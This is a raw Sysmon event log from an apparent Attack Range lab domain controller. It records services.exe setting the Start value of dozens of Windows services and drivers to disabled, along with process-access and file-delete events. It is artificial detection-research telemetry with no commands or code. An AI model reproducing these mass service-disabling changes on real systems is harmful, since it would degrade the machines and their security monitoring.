13241300x8000000000000000290651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NetTcpPortSharing\StartDWORD (0x00000004) 13241300x8000000000000000290650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NetSetupSvc\StartDWORD (0x00000004) 13241300x8000000000000000290649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\netprofm\StartDWORD (0x00000004) 13241300x8000000000000000290648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netman\StartDWORD (0x00000004) 10341000x8000000000000000290647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.929{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6905-000000003802}1000C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\StartDWORD (0x00000004) 13241300x8000000000000000290645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NetBT\StartDWORD (0x00000004) 13241300x8000000000000000290644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NetBIOS\StartDWORD (0x00000004) 13241300x8000000000000000290643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ndproxy\StartDWORD (0x00000004) 13241300x8000000000000000290642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ndiswanlegacy\StartDWORD (0x00000004) 13241300x8000000000000000290641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NdisWan\StartDWORD (0x00000004) 13241300x8000000000000000290640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NdisVirtualBus\StartDWORD (0x00000004) 13241300x8000000000000000290639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Ndisuio\StartDWORD (0x00000004) 13241300x8000000000000000290638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NdisTapi\StartDWORD (0x00000004) 13241300x8000000000000000290637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NdisImPlatform\StartDWORD (0x00000004) 13241300x8000000000000000290636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.929{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NdisCap\StartDWORD (0x00000004) 13241300x8000000000000000290635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NDIS\ImagePath\SystemRoot\system32\drivers\ndis.sys 13241300x8000000000000000290634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NDIS\StartDWORD (0x00000004) 13241300x8000000000000000290633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ndfltr\StartDWORD (0x00000004) 13241300x8000000000000000290632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NcbService\StartDWORD (0x00000004) 13241300x8000000000000000290631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NcaSvc\StartDWORD (0x00000004) 13241300x8000000000000000290630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mvumis\ImagePath\SystemRoot\System32\drivers\mvumis.sys 12241200x8000000000000000290629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mvumis\StartOverride 13241300x8000000000000000290628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mvumis\StartDWORD (0x00000004) 13241300x8000000000000000290627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Mup\ImagePath\SystemRoot\System32\Drivers\mup.sys 13241300x8000000000000000290626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Mup\StartDWORD (0x00000004) 13241300x8000000000000000290625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MTConfig\StartDWORD (0x00000004) 13241300x8000000000000000290624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.913{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mssmbios\StartDWORD (0x00000004) 13241300x8000000000000000290623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MsRPC\StartDWORD (0x00000004) 13241300x8000000000000000290622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MsLbfoProvider\StartDWORD (0x00000004) 13241300x8000000000000000290621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MSiSCSI\StartDWORD (0x00000004) 13241300x8000000000000000290620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\msisadrv\ImagePath\SystemRoot\System32\drivers\msisadrv.sys 13241300x8000000000000000290619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\msisadrv\StartDWORD (0x00000004) 13241300x8000000000000000290618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mshidumdf\StartDWORD (0x00000004) 23542300x8000000000000000290617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.898{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=03309E562DE9B12CA9F92675C98C31EC,SHA256=7B1852B5EA15ECDC5C6A659423FCB99F4D8D0939B943A0837DC07930C20FC481,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000290616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mshidkmdf\StartDWORD (0x00000004) 13241300x8000000000000000290615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\msgpiowin32\StartDWORD (0x00000004) 13241300x8000000000000000290614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Msfs\StartDWORD (0x00000004) 13241300x8000000000000000290613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MsBridge\StartDWORD (0x00000004) 13241300x8000000000000000290612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mrxsmb20\StartDWORD (0x00000004) 13241300x8000000000000000290611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.898{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mrxsmb10\StartDWORD (0x00000004) 23542300x8000000000000000290610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.898{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3334AF8695538418C584C068B928B40E,SHA256=01A9D46668A690DA831AE7727E86339819E35BE7CC23A84F50C52592E034EA2E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000290609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mrxsmb\StartDWORD (0x00000004) 13241300x8000000000000000290608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MpsSvc\StartDWORD (0x00000004) 13241300x8000000000000000290607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mpsdrv\StartDWORD (0x00000004) 10341000x8000000000000000290606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.882{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.882{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\StartDWORD (0x00000004) 10341000x8000000000000000290603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.882{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.882{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mountmgr\ImagePath\SystemRoot\System32\drivers\mountmgr.sys 13241300x8000000000000000290600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mountmgr\StartDWORD (0x00000004) 13241300x8000000000000000290599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mouhid\StartDWORD (0x00000004) 13241300x8000000000000000290598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mouclass\StartDWORD (0x00000004) 13241300x8000000000000000290597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\monitor\StartDWORD (0x00000004) 13241300x8000000000000000290596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Modem\StartDWORD (0x00000004) 13241300x8000000000000000290595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MMCSS\StartDWORD (0x00000004) 13241300x8000000000000000290594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\mlx4_bus\StartDWORD (0x00000004) 13241300x8000000000000000290593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasr\ImagePath\SystemRoot\System32\drivers\megasr.sys 12241200x8000000000000000290592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasr\StartOverride 10341000x8000000000000000290591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.882{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasr\StartDWORD (0x00000004) 10341000x8000000000000000290589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.882{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.882{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.882{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasas2i\ImagePath\SystemRoot\System32\drivers\MegaSas2i.sys 12241200x8000000000000000290585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasas2i\StartOverride 